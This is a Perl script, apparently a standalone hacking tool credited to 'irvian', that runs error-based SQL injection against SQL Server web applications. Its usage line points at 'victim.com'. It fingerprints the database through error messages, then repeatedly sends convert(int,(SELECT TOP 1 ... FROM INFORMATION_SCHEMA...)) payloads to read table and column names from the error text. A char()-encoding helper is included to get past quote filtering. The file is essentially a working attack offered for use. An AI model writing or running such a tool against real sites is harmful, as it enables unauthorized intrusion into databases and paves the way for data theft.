print "[*]---------------------------------[*]\r\n";
print "[*] DATABASE INJECTOR [*]\r\n";
print "[*] TYPE DATABASE [*]\r\n";
print "[*] SQL SERVER [*]\r\n";
print "[*] created by irvian [*]\r\n";
print "[*]---------------------------------[*]\r\n";
unless ($ARGV[0] and $ARGV[1]){
print "\nuse:$0 \"http://victim.com/query?patch=1\" scan\r\n";
print "change scan with table name for scan column in a table\r\n";
exit;
}
$host = $ARGV[0];
$tbl = $ARGV[1];
if ($host =~ /^https:\/\//i){
$host = "http:\/\/".$';}
if ($host !~ /^http:\/\//i){
$host = "http:\/\/".$ARGV[0];}
if ($host =~ /(.*)\/(.*)\?(.*)=/i){
$host = $&;}
else{
die "Wrong URL, Check Patch Or Query Variabel\n";}
$url = $host."1\'";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$res = $b->request(HTTP::Request->new(GET=>$url));
$browser = $res->content;
print "Detection Database.....\r\n";
sleep (2);
if ($browser =~ /JET Database/i){
die "Program Can't Work On Database Microsoft Jet\n"}
elsif ($browser =~ /Microsoft Access/i){
die "Program Can't Work On Database Microsoft Access\n";}
elsif ($browser =~ /MYSQL/i){
die "Program Can't Work On Database MYSQL\n";}
#SQL SERVER
elsif ($browser =~ /SQL Server|SQLServer/i){
print "Database SQL Server\r\n";
$n=1;
$found="\'\'";
if ($tbl eq "scan") {
print "Scan All Table....\r\n";
while ($url="$host"."convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN($found)))--", $res=$b->request(HTTP::Request->new(GET=>$url)), $browser=$res->content, $browser =~ /converting the nvarchar value \'(.+)\'/i)
{
print "Table $n: $1\n";
$weks=$1;
$hiks = &jancok($weks);
$found .= ",$hiks";
$n++;
}
if ($n != 1) {
print "Total Table : ".($n-1)."\n";exit;}
else {
die "Table Not found!\n";
}
}
else {
print "Scan All Column on Table $tbl\r\n";
$duh=&jancok($tbl);
while ($url="$host"."convert(int,(SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=$duh%20AND%20COLUMN_NAME%20NOT%20IN%20($found)))--", $res=$b->request(HTTP::Request->new(GET=>$url)), $browser=$res->content, $browser =~ /converting the nvarchar value \'(.+)\'/i)
{
print "Column $n: $1\n";
$weks=$1;
$hiks = &jancok($weks);
$found .= ",$hiks";
$n++;
}
if ($n != 1) {
print "Total Column : ".($n-1)."\n";exit;}
else {
die "Column NOT found!\n";
}
}
}
else {
die "Injection Not Work in Victim\n";}
#created by irvian
sub jancok{
$weks=$_[0];
%ascii =
(
" " => "char(32)",
"!" => "char(33)",
"\"" => "char(34)",
"#" => "char(35)",
"\$" => "char(36)",
"%" => "char(37)",
"&" => "char(38)",
"'" => "char(39)",
"(" => "char(40)",
")" => "char(41)",
"*" => "char(42)",
"+" => "char(43)",
"," => "char(44)",
"-" => "char(45)",
"." => "char(46)",
"/" => "char(47)",
"0" => "char(48)",
"1" => "char(49)",
"2" => "char(50)",
"3" => "char(51)",
"4" => "char(52)",
"5" => "char(53)",
"6" => "char(54)",
"7" => "char(55)",
"8" => "char(56)",
"9" => "char(57)",
":" => "char(58)",
";" => "char(59)",
"<" => "char(60)",
"=" => "char(61)",
">" => "char(62)",
"?" => "char(63)",
"@" => "char(64)",
"A" => "char(65)",
"B" => "char(66)",
"C" => "char(67)",
"D" => "char(68)",
"E" => "char(69)",
"F" => "char(70)",
"G" => "char(71)",
"H" => "char(72)",
"I" => "char(73)",
"J" => "char(74)",
"K" => "char(75)",
"L" => "char(76)",
"M" => "char(77)",
"N" => "char(78)",
"O" => "char(79)",
"P" => "char(80)",
"Q" => "char(81)",
"R" => "char(82)",
"S" => "char(83)",
"T" => "char(84)",
"U" => "char(85)",
"V" => "char(86)",
"W" => "char(87)",
"X" => "char(88)",
"Y" => "char(89)",
"Z" => "char(90)",
"[" => "char(91)",
"\\" => "char(92)",
"]" => "char(93)",
"^" => "char(94)",
"_" => "char(95)",
"`" => "char(96)",
"a" => "char(97)",
"b" => "char(98)",
"c" => "char(99)",
"d" => "char(100)",
"e" => "char(101)",
"f" => "char(102)",
"g" => "char(103)",
"h" => "char(104)",
"i" => "char(105)",
"j" => "char(106)",
"k" => "char(107)",
"l" => "char(108)",
"m" => "char(109)",
"n" => "char(110)",
"o" => "char(111)",
"p" => "char(112)",
"q" => "char(113)",
"r" => "char(114)",
"s" => "char(115)",
"t" => "char(116)",
"u" => "char(117)",
"v" => "char(118)",
"w" => "char(119)",
"x" => "char(120)",
"y" => "char(121)",
"z" => "char(122)",
"{" => "char(123)",
"|" => "char(124)",
"}" => "char(125)",
"~" => "char(126)",
"" => "char(127)",
"€" => "char(128)",
"�" => "char(129)",
"‚" => "char(130)",
"ƒ" => "char(131)",
"„" => "char(132)",
"…" => "char(133)",
"†" => "char(134)",
"‡" => "char(135)",
"ˆ" => "char(136)",
"‰" => "char(137)",
"Š" => "char(138)",
"‹" => "char(139)",
"Œ" => "char(140)",
"�" => "char(141)",
"Ž" => "char(142)",
"�" => "char(143)",
"�" => "char(144)",
"‘" => "char(145)",
"’" => "char(146)",
"“" => "char(147)",
"”" => "char(148)",
"•" => "char(149)",
"–" => "char(150)",
"—" => "char(151)",
"˜" => "char(152)",
"™" => "char(153)",
"š" => "char(154)",
"›" => "char(155)",
"œ" => "char(156)",
"�" => "char(157)",
"ž" => "char(158)",
"Ÿ" => "char(159)",
" " => "char(160)",
"¡" => "char(161)",
"¢" => "char(162)",
"£" => "char(163)",
"¤" => "char(164)",
"¥" => "char(165)",
"¦" => "char(166)",
"§" => "char(167)",
"¨" => "char(168)",
"©" => "char(169)",
"ª" => "char(170)",
"«" => "char(171)",
"¬" => "char(172)",
"" => "char(173)",
"®" => "char(174)",
"¯" => "char(175)",
"°" => "char(176)",
"±" => "char(177)",
"²" => "char(178)",
"³" => "char(179)",
"´" => "char(180)",
"µ" => "char(181)",
"¶" => "char(182)",
"·" => "char(183)",
"¸" => "char(184)",
"¹" => "char(185)",
"º" => "char(186)",
"»" => "char(187)",
"¼" => "char(188)",
"½" => "char(189)",
"¾" => "char(190)",
"¿" => "char(191)",
"À" => "char(192)",
"Á" => "char(193)",
"Â" => "char(194)",
"Ã" => "char(195)",
"Ä" => "char(196)",
"Å" => "char(197)",
"Æ" => "char(198)",
"Ç" => "char(199)",
"È" => "char(200)",
"É" => "char(201)",
"Ê" => "char(202)",
"Ë" => "char(203)",
"Ì" => "char(204)",
"Í" => "char(205)",
"Î" => "char(206)",
"Ï" => "char(207)",
"Ð" => "char(208)",
"Ñ" => "char(209)",
"Ò" => "char(210)",
"Ó" => "char(211)",
"Ô" => "char(212)",
"Õ" => "char(213)",
"Ö" => "char(214)",
"×" => "char(215)",
"Ø" => "char(216)",
"Ù" => "char(217)",
"Ú" => "char(218)",
"Û" => "char(219)",
"Ü" => "char(220)",
"Ý" => "char(221)",
"Þ" => "char(222)",
"ß" => "char(223)",
"à" => "char(224)",
"á" => "char(225)",
"â" => "char(226)",
"ã" => "char(227)",
"ä" => "char(228)",
"å" => "char(229)",
"æ" => "char(230)",
"ç" => "char(231)",
"è" => "char(232)",
"é" => "char(233)",
"ê" => "char(234)",
"ë" => "char(235)",
"ì" => "char(236)",
"í" => "char(237)",
"î" => "char(238)",
"ï" => "char(239)",
"ð" => "char(240)",
"ñ" => "char(241)",
"ò" => "char(242)",
"ó" => "char(243)",
"ô" => "char(244)",
"õ" => "char(245)",
"ö" => "char(246)",
"÷" => "char(247)",
"ø" => "char(248)",
"ù" => "char(249)",
"ú" => "char(250)",
"û" => "char(251)",
"ü" => "char(252)",
"ý" => "char(253)",
"þ" => "char(254)",
"ÿ" => "char(255)"
);
@oh=split(/(?)/, $weks);
$kuda="";
$kacau="";
$i=0;
while ($kluk=@ascii{"$oh[$i]"}){
$i++;
$kacau .= "$kuda"."$kluk";
$kuda = "%2b";
}
return $kacau;
}
#write by irvian
